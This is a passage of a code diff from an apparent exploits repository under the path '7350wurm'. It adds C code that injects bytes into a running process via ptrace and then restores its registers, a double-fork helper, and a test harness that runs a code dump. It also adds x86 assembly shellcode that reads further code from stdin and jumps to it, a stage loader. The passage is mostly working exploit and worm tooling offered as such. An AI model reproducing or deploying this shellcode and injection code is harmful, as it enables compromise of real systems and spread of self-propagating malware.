	88	for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
	89	ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
	90	data_saved[addr_walker] & 0xff);
	91	}
	92
	93	/* restore regs */
	94	regs.regs.eip = safed_eip;
	95	if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
	96	perror ("ptrace PTRACE_GETREGS");
	97	exit (EXIT_FAILURE);
	98	}
	99
	100	if (ptrace (PTRACE_DETACH, cpid, NULL, NULL) < 0) {
	101	perror ("ptrace PTRACE_DETACH");
	102	exit (EXIT_FAILURE);
	103	}
	104
	105	exit (EXIT_SUCCESS);
	106	}
	107
	108
	109
	110	void
	111	hexdump (unsigned char *data, unsigned int amount)
	112	{
	113	unsigned int dp, p; /* data pointer */
	114	const char trans[] =
	115	"................................ !\"#$%&'()*+,-./0123456789"
	116	":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
	117	"nopqrstuvwxyz{\|}~...................................."
	118	"....................................................."
	119	"........................................";
	120
	121	for (dp = 1; dp <= amount; dp++) {
	122	printf ("%02x ", data[dp-1]);
	123	if ((dp % 8) == 0)
	124	printf (" ");
	125	if ((dp % 16) == 0) {
	126	printf ("\| ");
	127	p = dp;
	128	for (dp -= 16; dp < p; dp++)
	129	printf ("%c", trans[data[dp]]);
	130	printf ("\n");
	131	}
	132	}
	133	if ((amount % 16) != 0) {
	134	p = dp = 16 - (amount % 16);
	135	for (dp = p; dp > 0; dp--) {
	136	printf (" ");
	137	if (((dp % 8) == 0) && (p != 8))
	138	printf (" ");
	139	}
	140	printf (" \| ");
	141	for (dp = (amount - (16 - p)); dp < amount; dp++)
	142	printf ("%c", trans[data[dp]]);
	143	}
	144	printf ("\n");
	145
	146	return;
	147	}
	148
	149
	150	/* z_fork
	151	*
	152	* fork and detach forked client completely to avoid zombies.
	153	* taken from richard stevens excellent system programming book :) thanks,
	154	* whereever you are now.
	155	*
	156	* caveat: the pid of the child has already died, it can just be used to
	157	* differentiate between parent and not parent, the pid of the
	158	* child is inaccessibly.
	159	*
	160	* return pid of child for old process
	161	* return 0 for child
	162	*/
	163
	164	pid_t
	165	z_fork (void)
	166	{
	167	pid_t pid;
	168
	169	pid = fork ();
	170	if (pid < 0) {
	171	return (pid);
	172	} else if (pid == 0) {
	173	/* let the child fork again
	174	*/
	175
	176	pid = fork ();
	177	if (pid < 0) {
	178	return (pid);
	179	} else if (pid > 0) {
	180	/* let the child and parent of the second child
	181	* exit
	182	*/
	183	exit (EXIT_SUCCESS);
	184	}
	185
	186	return (0);
	187	}
	188
	189	waitpid (pid, NULL, 0);
	190
	191	return (pid);
	192	}


diff --git a/exploits/7350wurm/shellcode/t b/exploits/7350wurm/shellcode/t new file mode 100644 index 0000000..eb3478b --- /dev/null +++ b/exploits/7350wurm/shellcode/t
Binary files differ


diff --git a/exploits/7350wurm/shellcode/t.c b/exploits/7350wurm/shellcode/t.c new file mode 100644 index 0000000..7c1aa4f --- /dev/null +++ b/exploits/7350wurm/shellcode/t.c
@@ -0,0 +1,12 @@
	1
	2	#include <stdio.h>
	3
	4	int
	5	main (int argc, char *argv[])
	6	{
	7	char * foo[4] = { "./codedump", "a", "b", NULL };
	8
	9	execve (foo[0], foo, NULL);
	10	}
	11
	12


diff --git a/exploits/7350wurm/shellcode/write-read-exec.s b/exploits/7350wurm/shellcode/write-read-exec.s new file mode 100644 index 0000000..6f3956c --- /dev/null +++ b/exploits/7350wurm/shellcode/write-read-exec.s
@@ -0,0 +1,38 @@
	1	.globl cbegin
	2	.globl cend
	3
	4	cbegin:
	5
	6	/* write: ebx = fd, ecx = where, edx = length, eax = 4 */
	7	wr_pos: xorl %ebx, %ebx
	8	incl %ebx /* ebx = 1 */
	9
	10	movl $0x0b51740b, %eax
	11	subl $0x01010101, %eax
	12	push %eax
	13	movl %esp, %ecx /* ecx = "AAA\n" */
	14
	15	push $0x04
	16	pop %eax /* eax = 4 */
	17	movl %eax, %edx
	18
	19	int $0x80 /* write (1, "AAA\n", 4) */
	20
	21	jmp ctramp
	22	rd_cde: xorl %ebx, %ebx
	23	mull %ebx /* ebx = eax = edx = 0 */
	24
	25	decb %dl /* edx = 0xff */
	26	popl %ecx /* ecx = ncode */
	27
	28	push $0x3
	29	pop %eax
	30
	31	int $0x80 /* read (0, ncode, 0xff) */
	32	jmp ncode
	33
	34	ctramp: call rd_cde
	35	ncode:
	36
	37	cend:
	38